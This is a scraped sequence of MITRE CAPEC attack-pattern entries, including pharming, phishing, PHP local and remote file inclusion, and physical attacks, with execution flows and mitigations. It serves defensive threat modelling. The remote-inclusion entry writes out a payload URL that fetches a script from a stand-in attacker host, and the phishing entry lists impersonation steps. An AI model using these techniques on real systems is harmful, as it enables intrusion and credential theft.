From an attacker point of view, this may be sufficient to gain access to the password file on a poorly protected system. If the attacker can list directories of critical resources then read only access is not sufficient to protect the system.

Related Weaknesses

CWE-ID	Weakness Name
22	Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
33	Path Traversal

Relevant to the OWASP taxonomy mapping

Entry Name
Path Traversal

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

[REF-9] "OWASP Testing Guide". Testing for Path Traversal (OWASP-AZ-001). v4. The Open Web Application Security Project (OWASP). 2010. <https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)>.

[REF-10] "WASC Threat Classification 2.0". WASC-33 - Path Traversal. The Web Application Security Consortium (WASC). 2010. <http://projects.webappsec.org/w/page/13246952/Path-Traversal>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Activation_Zone, Alternate_Terms, Architectural_Paradigms, Attack_Motivation-Consequences, Attacker_Skills_or_Knowledge_Required, CIA_Impact, Examples-Instances, Frameworks, Injection_Vector, Languages, Payload, Payload_Activation_Impact, Platforms, Purposes, References, Related_Attack_Patterns, Related_Vulnerabilities, Related_Weaknesses, Relevant_Security_Requirements, Solutions_and_Mitigations, Technical_Context, Typical_Likelihood_of_Exploit, Typical_Severity
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-646: Peripheral Footprinting

Attack Pattern ID: 646

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	169	Footprinting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	270	Modification of Registry Run Keys

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The adversary needs either physical or remote access to the victim system.

Skills Required

[Level: Medium]

The adversary needs to be able to infect the victim system in a manner that gives them remote access.

[Level: Medium]

If analyzing the Windows registry, the adversary must understand the registry structure to know where to look for devices.

Mitigations

Identify programs that may be used to acquire peripheral information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1120	Peripheral Device Discovery

Content History

Submissions
Submission Date	Submitter	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team
2018-07-31 (Version 2.12)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations, Skills_Required

CAPEC-89: Pharming

Attack Pattern ID: 89

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	98	Phishing
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	142	DNS Cache Poisoning
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	543	Counterfeit Websites
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	611	BitSquatting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	630	TypoSquatting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	631	SoundSquatting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	632	Homograph Attack via Homoglyphs

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Exploit

Attacker sets up a system mocking the one trusted by the users. This is usually a website that requires or handles sensitive information.
The attacker then poisons the resolver for the targeted site. This is achieved by poisoning the DNS server, or the local hosts file, that directs the user to the original website
When the victim requests the URL for the site, the poisoned records direct the victim to the attackers' system rather than the original one.
Because of the identical nature of the original site and the attacker controlled one, and the fact that the URL is still the original one, the victim trusts the website reached and the attacker can now "farm" sensitive information such as credentials or account numbers.

Prerequisites

Vulnerable DNS software or improperly protected hosts file or router that can be poisoned

A website that handles sensitive information but does not use a secure connection and a certificate that is valid is also prone to pharming

Skills Required

[Level: Medium]

The attacker needs to be able to poison the resolver - DNS entries or local hosts file or router entry pointing to a trusted DNS server - in order to successfully carry out a pharming attack. Setting up a fake website, identical to the targeted one, does not require special skills.

Resources Required

None: No specialized resources are required to execute this type of attack. Having knowledge of the way the target site has been structured, in order to create a fake version, is required. Poisoning the resolver requires knowledge of a vulnerability that can be exploited.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

All sensitive information must be handled over a secure connection.

Known vulnerabilities in DNS or router software or in operating systems must be patched as soon as a fix has been released and tested.

End users must ensure that they provide sensitive information only to websites that they trust, over a secure connection with a valid certificate issued by a well-known certificate authority.

Example Instances

An online bank website requires users to provide their customer ID and password to log on, but does not use a secure connection.

An attacker can setup a similar fake site and leverage pharming to collect this information from unknowing victims.

Related Weaknesses

CWE-ID	Weakness Name
346	Origin Validation Error
350	Reliance on Reverse DNS Resolution for a Security-Critical Action

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Related_Weaknesses
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns

CAPEC-98: Phishing

Attack Pattern ID: 98

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	163	Spear Phishing
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	164	Mobile Phishing
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	656	Voice Phishing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	89	Pharming
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	543	Counterfeit Websites
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	611	BitSquatting
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	630	TypoSquatting
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	631	SoundSquatting
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	632	Homograph Attack via Homoglyphs
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	186	Malicious Software Update
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	701	Browser in the Middle (BiTM)

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Explore

Obtain domain name and certificate to spoof legitimate site: This optional step can be used to help the attacker impersonate the legitimate site more convincingly. The attacker can use homograph attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate.

Techniques
Optionally obtain a domain name that visually looks similar to the legitimate site's domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L)
Optionally obtain a legitimate SSL certificate for the new domain name.

Explore legitimate website and create duplicate: An attacker creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that they are trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here.

Techniques
Use spidering software to get copy of web pages on legitimate site.
Manually save copies of required web pages from legitimate site.
Create new web pages that have the legitimate site's look and feel, but contain completely new content.

Exploit

Convince user to enter sensitive information on attacker's site.: An attacker sends an e-mail to the victim that has some sort of a call to action to get the user to click on the link included in the e-mail (which takes the victim to attacker's website) and log in. The key is to get the victim to believe that the e-mail is coming from a legitimate entity with which the victim does business and that the website pointed to by the URL in the e-mail is the legitimate website. A call to action will usually need to sound legitimate and urgent enough to prompt action from the user.
Techniques
Send the user a message from a spoofed legitimate-looking e-mail address that asks the user to click on the included link.
Place phishing link in post to online forum.
Use stolen credentials to log into legitimate site: Once the attacker captures some sensitive information through phishing (login credentials, credit card information, etc.) the attacker can leverage this information. For instance, the attacker can use the victim's login credentials to log into their bank account and transfer money to an account of their choice.
Techniques
Log in to the legitimate site using another user's supplied credentials

Prerequisites

An attacker needs to have a way to initiate contact with the victim. Typically that will happen through e-mail.

An attacker needs to correctly guess the entity with which the victim does business and impersonate it. Most of the time phishers just use the most popular banks/services and send out their "hooks" to many potential victims.

An attacker needs to have a sufficiently compelling call to action to prompt the user to take action.

The replicated website needs to look extremely similar to the original website and the URL used to get to that website needs to look like the real URL of the said business entity.

Skills Required

[Level: Medium]

Basic knowledge about websites: obtaining them, designing and implementing them, etc.

Resources Required

Some web development tools to put up a fake website.

Indicators

You receive an e-mail from an entity that you are not even a customer of prompting you to log into your account.

You receive any e-mail that provides you with a link which takes you to a website on which you need to enter your log in information.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality	Read Data
Integrity	Modify Data

Mitigations

Do not follow any links that you receive within your e-mails and certainly do not input any login credentials on the page that they take you too. Instead, call your Bank, PayPal, eBay, etc., and inquire about the problem. A safe practice would also be to type the URL of your bank in the browser directly and only then log in. Also, never reply to any e-mails that ask you to provide sensitive information of any kind.

Example Instances

The target gets an official looking e-mail from their bank stating that their account has been temporarily locked due to suspected unauthorized activity and that they need to click on the link included in the e-mail to log in to their bank account in order to unlock it. The link in the e-mail looks very similar to that of their bank and once the link is clicked, the log in page is the exact replica. The target supplies their login credentials after which they are notified that their account has now been unlocked and that everything is fine. An attacker has just collected the target's online banking information which can now be used by the attacker to log into the target's bank account and transfer money to a bank account of the attackers' choice.

An adversary may use BlueJacking, or Bluetooth Phishing to send unsolicited contact cards, messages, or pictures to nearby devices that are listening via Bluetooth. These messages may contain phishing content.

Related Weaknesses

CWE-ID	Weakness Name
451	User Interface (UI) Misrepresentation of Critical Information

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1566	Phishing
1598	Phishing for Information

References

[REF-656] "Wireless Security - Bluejack a Victim". TutorialsPoint. <https://www.tutorialspoint.com/wireless_security/wireless_security_bluejack_a_victim.htm>. URL validated: 2021-06-11.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attacker_Skills_or_Knowledge_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances, Execution_Flow, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Example_Instances, Execution_Flow
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Example_Instances, References
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns, Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-252: PHP Local File Inclusion

Attack Pattern ID: 252

Abstraction: Detailed

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	251	Local Code Inclusion

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Survey application: Using a browser or an automated tool, an adversary follows all public links on a web site. They record all the links they find. The adversary is looking for URLs that show PHP file inclusion is used, which can look something like "http://vulnerable-website/file.php?file=index.php".

Techniques
Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.

Experiment

Attempt variations on input parameters: Once the adversary finds a vulnerable URL that takes file input, they attempt a variety of path traversal techniques to attempt to get the application to display the contents of a local file, or execute a different PHP file already stored locally on the server.

Techniques
Use a list of probe strings to inject in parameters of known URLs. The probe strings are variants of path traversal techniques used to include well known files.
Use a proxy tool to record results of manual input of local file inclusion probes in known URLs.

Exploit

Include desired local file: Once the adversary has determined which techniques of path traversal successfully work with the vulnerable PHP application, they will target a specific local file to include. These can be files such as "/etc/passwd", "/etc/shadow", or configuration files for the application that might expose sensitive information.

Prerequisites

The targeted PHP application must have a bug that allows an attacker to control which code file is loaded at some juncture.

Resources Required

The attacker needs to have enough access to the target application to control the identity of a locally included PHP file.

Related Weaknesses

CWE-ID	Weakness Name
829	Inclusion of Functionality from Untrusted Control Sphere

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-621] "OWASP Vulnerabilities". PHP File Inclusion. The Open Web Application Security Project (OWASP). <https://owasp.org/www-community/vulnerabilities/PHP_File_Inclusion>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow

CAPEC-193: PHP Remote File Inclusion

Attack Pattern ID: 193

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	253	Remote Code Inclusion

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Survey application: Using a browser or an automated tool, an adversary follows all public links on a web site. They record all the links they find.

Techniques
Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.

Experiment

Attempt variations on input parameters: The attack variants make use of a remotely available PHP script that generates a uniquely identifiable output when executed on the target application server. Possibly using an automated tool, an adversary requests variations on the inputs they surveyed before. They send parameters that include variations of payloads which include a reference to the remote PHP script. They record all the responses from the server that include the output of the execution of remote PHP script.

Techniques
Use a list of probe strings to inject in parameters of known URLs. The probe strings are variants of PHP remote file inclusion payloads which include a reference to the adversary controlled remote PHP script.
Use a proxy tool to record results of manual input of remote file inclusion probes in known URLs.

Exploit

Run arbitrary server-side code: As the adversary succeeds in exploiting the vulnerability, they are able to execute server-side code within the application. The malicious code has virtual access to the same resources as the targeted application. Note that the adversary might include shell code in their script and execute commands on the server under the same privileges as the PHP runtime is running with.
Techniques
Develop malicious PHP script that is injected through vectors identified during the Experiment Phase and executed by the application server to execute a custom PHP script.

Prerequisites

Target application server must allow remote files to be included in the "require", "include", etc. PHP directives

The adversary must have the ability to make HTTP requests to the target web application.

Skills Required

[Level: Low]

To inject the malicious payload in a web page

[Level: Medium]

To bypass filters in the application

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Authorization	Execute Unauthorized Commands
Accountability Authentication Authorization Non-Repudiation	Gain Privileges
Access Control Authorization	Bypass Protection Mechanism

Mitigations

Implementation: Perform input validation for all remote content, including remote and user-generated content

Implementation: Only allow known files to be included (allowlist)

Implementation: Make use of indirect references passed in URL parameters instead of file names

Configuration: Ensure that remote scripts cannot be include in the "include" or "require" PHP directives

Example Instances

The adversary controls a PHP script on a server "http://attacker.com/rfi.txt"
The .txt extension is given so that the script doesn't get executed by the attacker.com server, and it will be downloaded as text. The target application is vulnerable to PHP remote file inclusion as following: include($_GET['filename'] . '.txt')
The adversary creates an HTTP request that passes their own script in the include: http://example.com/file.php?filename=http://attacker.com/rfi with the concatenation of the ".txt" prefix, the PHP runtime download the attack's script and the content of the script gets executed in the same context as the rest of the original script.

Related Weaknesses

CWE-ID	Weakness Name
98	Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
80	Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)

References

[REF-59] "WASC Threat Classification 2.0". WASC-05 - Remote File Inclusion. The Web Application Security Consortium (WASC). 2010. <http://projects.webappsec.org/Remote-File-Inclusion>.

[REF-60] Shaun Clowes. "A Study In Scarlet, Exploiting Common Vulnerabilities in PHP Applications". Blackhat Briefings Asia 2001. <http://securereality.com.au/studyinscarlett/>.

[REF-621] "OWASP Vulnerabilities". PHP File Inclusion. The Open Web Application Security Project (OWASP). <https://owasp.org/www-community/vulnerabilities/PHP_File_Inclusion>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Payload_Activation_Impact, Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Consequences
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances, Execution_Flow, Mitigations
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-547: Physical Destruction of Device or Component

Attack Pattern ID: 547

Abstraction: Standard

View customized information:

Description

An adversary conducts a physical attack a device or component, destroying it such that it no longer functions as intended.

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	607	Obstruction

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Physical Security
Mechanisms of Attack	Manipulate System Resources

Related Weaknesses

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns

CAPEC-507: Physical Theft

Attack Pattern ID: 507

Abstraction: Meta

View customized information:

Description

Relationships

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Physical Security
Mechanisms of Attack	Subvert Access Control

Prerequisites

This type of attack requires the existence of a physical target that an adversary believes hosts something of value.

Mitigations

To mitigate this type of attack, physical security techniques such as locks doors, alarms, and monitoring of targets should be implemented.

Related Weaknesses

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)

CAPEC-401: Physically Hacking Hardware

Attack Pattern ID: 401

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	440	Hardware Integrity Attack
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	402	Bypassing ATA Password Security

This table shows the views that this attack pattern belongs to and top level categories within that view.

